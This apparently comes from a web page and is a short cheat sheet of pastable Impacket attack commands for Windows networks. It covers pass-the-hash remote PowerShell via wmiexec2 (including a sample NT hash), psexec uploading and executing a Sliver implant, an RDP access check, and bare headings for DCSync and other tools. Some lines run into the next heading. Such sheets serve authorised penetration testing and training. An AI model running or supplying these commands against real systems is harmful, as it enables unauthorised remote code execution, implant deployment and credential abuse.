Impacket Pastable Commands
wmiexec2 — Pass the Hash with NT Hash Only
python3 wmiexec2.py ./Administrator@TARGET -hashes ':NT_HASH' -shell-type powershell
python3 wmiexec2.py DOMAIN/Administrator@TARGET -hashes ':fd02e525dd676fd8ca04e200d265f20c' -shell-type powershellimpacket-psexec — Push and Execute Binary
impacket-psexec DOMAIN/user:"password"@TARGET -c /tmp/sliver.exe
impacket-psexec ./user:"password"@TARGET -c /tmp/sliver.exeimpacket-rdp_check — Verify RDP Access
impacket-rdp_check DOMAIN/user:'password'@TARGET
# Access Granted = can RDP
# Access Denied = cannot RDPimpacket-secretsdump — DCSync with Kerberos
impacket-ticketConverter
impacket-mssqlclient
Windows Auth issues
Last updated